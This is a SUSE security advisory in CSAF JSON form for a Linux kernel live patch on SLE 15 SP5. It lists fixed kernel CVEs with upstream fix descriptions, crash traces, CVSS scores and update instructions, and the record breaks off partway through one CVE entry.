| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
59 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 27 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.110 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1002,SUSE-2026-1006,SUSE-2026-1038,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1006",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1002-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1002-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261002-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1002-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024904.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250730",
"url": "https://bugzilla.suse.com/1250730"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53257 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 27 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-25T09:34:30Z",
"generator": {
"date": "2026-03-25T09:34:30Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1002-1",
"initial_release_date": "2026-03-25T09:34:30Z",
"revision_history": [
{
"date": "2026-03-25T09:34:30Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_103-default-15-150500.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_113-default-13-150500.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check S1G action frame size\n\nBefore checking the action code, check that it even\nexists in the frame.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53257",
"url": "https://www.suse.com/security/cve/CVE-2023-53257"
},
{
"category": "external",
"summary": "SUSE Bug 1249869 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1249869"
},
{
"category": "external",
"summary": "SUSE Bug 1250730 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1250730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2023-53257"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
